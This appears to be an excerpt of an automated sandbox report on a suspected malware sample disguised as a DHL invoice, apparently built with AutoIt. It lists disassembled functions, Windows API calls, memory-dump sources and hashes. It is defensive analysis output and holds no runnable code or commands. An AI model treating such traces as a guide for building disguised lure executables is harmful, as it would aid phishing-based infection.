                                                                                                                        • Instruction Fuzzy Hash: 92E01A362202049FD711EF59D844E9AF7EDEF99760F00841AFD49DB351DA70AC408B90
                                                                                                                        Function 003509D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,003503EE), ref: 003509DA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: 7e3fb02ebf6dc3b12a4f888f200c6e03437fce0a10f339fec2caa037051c5189
                                                                                                                        • Instruction ID: 6194fd11ecca6938c5ef420c80c741148b50d3afcd87d08ef425616cca335706
                                                                                                                        • Opcode Fuzzy Hash: 7e3fb02ebf6dc3b12a4f888f200c6e03437fce0a10f339fec2caa037051c5189
                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                        Function 0035781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 0-4108050209
                                                                                                                        • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                        • Instruction ID: f1968dd1a50a5da8f6c701b57a2c3476d648fbefaa0fa1e4bd4f40afd9bb10d0
                                                                                                                        • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                        • Instruction Fuzzy Hash: 7F51677160C6455BDB3B8628A85FFFE23999B12343F190509DC82DB6B2C715EE0DD3A2
                                                                                                                        Function 003A2046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0&@
                                                                                                                        • API String ID: 0-1848180278
                                                                                                                        • Opcode ID: 5bec0f454ff8e4b06f871400d07f5d20693cbe5e45254eb8c834d25586d0f7ff
                                                                                                                        • Instruction ID: 9de7b97fbf7528f52a019c4a515bdacf3607961dc7c54bf4d612678c579202fe
                                                                                                                        • Opcode Fuzzy Hash: 5bec0f454ff8e4b06f871400d07f5d20693cbe5e45254eb8c834d25586d0f7ff
                                                                                                                        • Instruction Fuzzy Hash: 2521D5322206118BD728CE79C92267F73E5EB54310F158A2EE4A7D73D0DE7AA904DB84
                                                                                                                        Function 00366DD9 Relevance: .6, Instructions: 637COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bd9af9f2d04dd9838f72a2c4aad2394e77dbc3f51be658f62c830b97f66ecca9
                                                                                                                        • Instruction ID: 87b1cebe20a055e0e646aaf7721ccca6b24fc8e1b4257e4b8001c9091c69b1e1
                                                                                                                        • Opcode Fuzzy Hash: bd9af9f2d04dd9838f72a2c4aad2394e77dbc3f51be658f62c830b97f66ecca9
                                                                                                                        • Instruction Fuzzy Hash: 86323422D2AF414DD7239635DC22336A34DAFB73C9F55D737E82AB59A9EB29C4834100
                                                                                                                        Function 0034CC39 Relevance: .6, Instructions: 635COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e55149ace45c7def1be7fb61e160e67d56db4945c9785c408e81ed85a4a2600d
                                                                                                                        • Instruction ID: 87922e76f4e6d2fd5d3c938dc8fa292d67330d1c10064cc05516cf8c9a47f5a5
                                                                                                                        • Opcode Fuzzy Hash: e55149ace45c7def1be7fb61e160e67d56db4945c9785c408e81ed85a4a2600d
                                                                                                                        • Instruction Fuzzy Hash: 5F322931A203058BCF2BEF28C4D467D77E5EB45300F2AA5A6D959CB691D334ED82DB60
                                                                                                                        Function 00337920 Relevance: .6, Instructions: 563COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 163b2c3eb46c6e4424389b5eaa4663f62bc4e01e61c5b2fdeaee4d923eca2d28
                                                                                                                        • Instruction ID: b6eb8ae1ee6b93fa5049093fe66cede10633e858352e03797b0a45cd189a05d1
                                                                                                                        • Opcode Fuzzy Hash: 163b2c3eb46c6e4424389b5eaa4663f62bc4e01e61c5b2fdeaee4d923eca2d28
                                                                                                                        • Instruction Fuzzy Hash: 3022C5B0A04609DFDF2ACF64C881BAEB7F5FF44300F148529E816AB291E779AD55CB50
                                                                                                                        Function 003391C0 Relevance: .5, Instructions: 475COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 173ee0a583ef58f4868ba07c5b8f27ce1ee702fa18a82e3ec32293f02908996e
                                                                                                                        • Instruction ID: a7d6568ea985bfd08146b545012f90ad704c955f8f8a54da772715e7f8e639ee
                                                                                                                        • Opcode Fuzzy Hash: 173ee0a583ef58f4868ba07c5b8f27ce1ee702fa18a82e3ec32293f02908996e
                                                                                                                        • Instruction Fuzzy Hash: 8202C7B1E0010AEFDB16DF54D881AAEB7B5FF48300F118169E81ADF290E735EA50CB91
                                                                                                                        Function 00351C77 Relevance: .3, Instructions: 254COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                        • Instruction ID: 3a9756473ca93097744823709d188ca7979b38f64e769c3963f3a9d3c1607c6c
                                                                                                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                        • Instruction Fuzzy Hash: E49176321080E34ADB2B463A8535A7EFFF15A523A371B079DDCF2CA1E5EE10895CD620
                                                                                                                        Function 003519B0 Relevance: .2, Instructions: 240COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                        • Instruction ID: 2115388321932e1fc467189b9025db696693b645c345a8c02604e3e6c2dc723c
                                                                                                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                                        • Instruction Fuzzy Hash: 489162722090A34ADB2F427A857493EFFE55A923A331B079DDCF2CA1E1FE14855CD620
                                                                                                                        Function 00357A4A Relevance: .2, Instructions: 237COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5c7949ccfd2543fe1f458a2429c216c18799797b714e129f0d1d6ee25222db85
                                                                                                                        • Instruction ID: 24792e704e75b2cc33db58e763e26862aea1949da438974faa2a8e0e60c2dd03
                                                                                                                        • Opcode Fuzzy Hash: 5c7949ccfd2543fe1f458a2429c216c18799797b714e129f0d1d6ee25222db85
                                                                                                                        • Instruction Fuzzy Hash: 7461677160878957EA3B9A28B899FBE2398DF41303F150919EC43DF3B1DA119E4E8355
                                                                                                                        Function 00351706 Relevance: .2, Instructions: 232COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                        • Instruction ID: d5080c76cfcf36ab21411d02bca05b3ebdc67adb365ee61284d1b994834fc9ff
                                                                                                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                        • Instruction Fuzzy Hash: FB8187725080A309DB6F423D8534A7EFFE15A923A371B079DDCF2CA1E1EE14995CE660
                                                                                                                        Function 00EB02F8 Relevance: .1, Instructions: 92COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2053537403.0000000000EAC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAC000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_eac000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                        • Instruction ID: a1cc199c48ef92af60b0bea4c687ebfd0763b06e96ec75d0028551cf677b7fd6
                                                                                                                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                        • Instruction Fuzzy Hash: FC41A271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                                                                                                                        Function 00EB01E8 Relevance: .0, Instructions: 35COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2053537403.0000000000EAC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAC000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_eac000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                        • Instruction ID: ed8e669699fdb027b4491704bbbfa29b5a8d72e2b0095fe130361223cda785f6
                                                                                                                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                        • Instruction Fuzzy Hash: 06019D78A00209EFCB48DF98D5909AEF7F5FB48310F208699E909A7716D730AE51DB80
                                                                                                                        Function 00EB0188 Relevance: .0, Instructions: 35COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2053537403.0000000000EAC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAC000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_eac000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                        • Instruction ID: 781d5565b1e1a63f3b96cb093d283896925702b04695540286bc428823dac337
                                                                                                                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                        • Instruction Fuzzy Hash: F5019278A05209EFCB49DF98C5909AEF7F6FB48310F208599E809A7301D730AE41DB80
                                                                                                                        Function 00EAEB78 Relevance: .0, Instructions: 6COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2053537403.0000000000EAC000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EAC000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_eac000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                        Function 003B2ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 003B2B30
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 003B2B43
                                                                                                                        • DestroyWindow.USER32 ref: 003B2B52
                                                                                                                        • GetDesktopWindow.USER32 ref: 003B2B6D
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 003B2B74
                                                                                                                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 003B2CA3
                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 003B2CB1
                                                                                                                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2CF8
                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 003B2D04
                                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 003B2D40
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2D62
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2D75
                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2D80
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 003B2D89
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2D98
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 003B2DA1
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2DA8
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 003B2DB3
                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2DC5
                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,003CFC38,00000000), ref: 003B2DDB
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 003B2DEB
                                                                                                                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 003B2E11
                                                                                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 003B2E30
                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B2E52
                                                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003B303F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                        • API String ID: 2211948467-2373415609
                                                                                                                        • Opcode ID: 5a15b29d0f92d6443157d77f33eaa8f4a3937e3f0f29ae87378681213ebd7574
                                                                                                                        • Instruction ID: 1de84994881bc7ba5186d394dc5446646b45e41f7bdbbae5efb9268e0dcd2ec8
                                                                                                                        • Opcode Fuzzy Hash: 5a15b29d0f92d6443157d77f33eaa8f4a3937e3f0f29ae87378681213ebd7574
                                                                                                                        • Instruction Fuzzy Hash: FD027C71910219AFDB16DF64CD89EAE7BB9EF49314F048518F919EB2A1CB70ED01CB60
                                                                                                                        Function 003C70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 003C712F
                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 003C7160
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 003C716C
                                                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 003C7186
                                                                                                                        • SelectObject.GDI32(?,?), ref: 003C7195
                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 003C71C0
                                                                                                                        • GetSysColor.USER32(00000010), ref: 003C71C8
                                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 003C71CF
                                                                                                                        • FrameRect.USER32(?,?,00000000), ref: 003C71DE
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 003C71E5
                                                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 003C7230
                                                                                                                        • FillRect.USER32(?,?,?), ref: 003C7262
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003C7284
                                                                                                                          • Part of subcall function 003C73E8: GetSysColor.USER32(00000012), ref: 003C7421
                                                                                                                          • Part of subcall function 003C73E8: SetTextColor.GDI32(?,?), ref: 003C7425
                                                                                                                          • Part of subcall function 003C73E8: GetSysColorBrush.USER32(0000000F), ref: 003C743B
                                                                                                                          • Part of subcall function 003C73E8: GetSysColor.USER32(0000000F), ref: 003C7446
                                                                                                                          • Part of subcall function 003C73E8: GetSysColor.USER32(00000011), ref: 003C7463
                                                                                                                          • Part of subcall function 003C73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003C7471
                                                                                                                          • Part of subcall function 003C73E8: SelectObject.GDI32(?,00000000), ref: 003C7482
                                                                                                                          • Part of subcall function 003C73E8: SetBkColor.GDI32(?,00000000), ref: 003C748B
                                                                                                                          • Part of subcall function 003C73E8: SelectObject.GDI32(?,?), ref: 003C7498
                                                                                                                          • Part of subcall function 003C73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 003C74B7
                                                                                                                          • Part of subcall function 003C73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003C74CE
                                                                                                                          • Part of subcall function 003C73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 003C74DB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
